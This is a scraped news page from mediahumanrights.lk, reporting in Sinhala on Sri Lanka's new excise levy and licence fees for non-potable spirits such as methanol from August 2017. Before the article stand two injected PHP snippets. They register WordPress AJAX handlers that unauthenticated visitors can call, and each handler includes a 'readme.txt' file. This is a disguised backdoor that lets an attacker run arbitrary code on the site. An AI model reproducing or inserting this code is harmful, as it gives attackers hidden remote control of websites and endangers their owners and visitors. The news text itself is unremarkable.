if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } පානීය නොවන ස්ප්‍රීතු සඳහා බදු පැනවේ - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

පානීය නොවන ස්ප්‍රීතු සඳහා බදු පැනවේ

පානීය නොවන ස්ප්‍රීතු ආනයනය වහාම ක්‍රියාත්මක වන පරිදි රුපියල් 50,000 ක වාර්ෂික බලපත්‍ර ගාස්තුවකට යටත් කර ඇති අතර, ඒ අනුව මෙතනෝල් ස්ප්‍රීතු ලීටර් 01 ක් සඳහා රුපියල් 25 ක නව බද්දක්ද, මහා භාණ්ඩාගාරය විසින් පනවා ඇත.
මෙම නව බදු පැනවීම අගෝස්තු 01දා සිට ක්‍රියාත්මක වන අතර මෙම නව බදු පැනවීම සම්බන්ධයෙන් අංක 2029/50 සහ 28.07.2017 දිනැති ගැසට් පත්‍රය මුදල් හා ජනමාධ්‍ය අමාත්‍ය මංගල සමරවීර මහතා විසින් 2017.07.28 දින නිකුත් කර ඇත.
මෙම නව රෙගුලාසියට මින් පසු පානීය නොවන ස්ප්‍රීතු කිසිම තැනැත්තෙකු විසින් ආනයනය කිරීම, අපනයනය කිරීම, නිෂ්පාදනය කිරීම, සන්තකයේ තබාගැනීම, ගබඩා කිරීම, විකිණීම, ප්‍රවාහනය කිරීම, විකිණීම සඳහා ඉදිරිපත් කිරීම හෝ ප්‍රදර්ශනය කිරීම සඳහා සුරාබදු කොමසාරිස් ජනරාල් වරයාගෙන් බලපත්‍රයක් ලබාගත යුතුවේ.
මෙතෙක් එතනෝල් ආනයනය පමණක් මත්පැන් ලෙස සලකා බලපත්‍ර ගාස්තුවට යටත් කළ නමුදු රසායනික නිෂ්පාදනය සඳහා භාවිත කරනු ලබන පානීය නොවන මෙතනෝල් ස්ප්‍රීතු ආනයනය සුරා බලපත්‍ර ගාස්තු වලින් හා සුරාබදු වලින් නිදහස් කර තිබුණි.
මෙසේ බලපත්‍ර ගාස්තුවලින් තොර මෙතනෝල් ආනයනය කිරීම සඳහා ලබාදී ඇති අවස්ථාව වැරදි ලෙස භාවිත කරමින් නිත්‍යනුකූල නොවන අයුරින් මත්පැන් නිෂ්පාදනය කිරීම සඳහා එතනෝල් ආනයනය කරන අවස්ථා පිළිබඳ ව වාර්තා වූ හෙයින් මෙසේ පානීය නොවන ස්ප්‍රීතු ආනයනයද මුදල් හා ජනමාධ්‍ය අමාත්‍යාංශය විසින් සුරාබදු පනතට යටත් කර, බලපත්‍ර ගාස්තුවක්ද සමඟ තොග ලීටර් 01 ක් සඳහා රු. 25 ක ආනයනික සුරා බද්දක් පනවා තිබේ.
නීතිවිරෝධී මත්පැන් නිෂ්පාදනය හා ප්‍රවාහනයට එරෙහි සුරාබදු දෙපාර්තමේන්තුව විසින් මෑතකාලයේදී කරන ලද වැටලීම් හේතුවෙන් එම නීතිවිරෝධී මත්පැන් නිෂ්පාදනය පාලනය කරගැනීමට හැකිවූ අතර, දෙපාර්තමේන්තුවේ සුරාබදු ආදායමද සැලකිය යුතු අයුරින් මෑතකදී වැඩිවී ඇත.
නව රෙගුලාසි අනුව 2017 අගෝස්තු 01 දින සිට පානීය නොවන ස්ප්‍රීතු නිෂ්පාදනය, ගබඩා කිරීම හා තොග වශයෙන් අලෙවිය සඳහා රු. 50,000 ක වාර්ෂික බලපත්‍ර ගාස්තුවකටද, එම ස්ප්‍රීතු ආනයනය, ගබඩා කිරීම හා තොග වශයෙන් අලෙවි කිරීම සඳහා රු. 50,000 ක බලපත්‍ර ගාස්තුවකට යටත් කර තිබේ.
එම ස්ප්‍රීතු අපනයනය සඳහා වන වාර්ෂික බලපත්‍ර ගාස්තුව රු. 10,000 ක් වන අතර, සිල්ලරට විකිණීමේ බලපත්‍ර ගාස්තුව රු. 5,000 ක් වේ.
(under the courtesy of adaderana news web)

Related posts

සර්ව පාක්‍ෂික ආණ්ඩුවක්…

Shiran Viraj

මා අගමැති වූ පසු රෑ 12ට ඇවිත් පිරිසිදුදැයි බලනවා

Shiran Viraj

ඩොලරය 340 සීමාවට පනී..

Shiran Viraj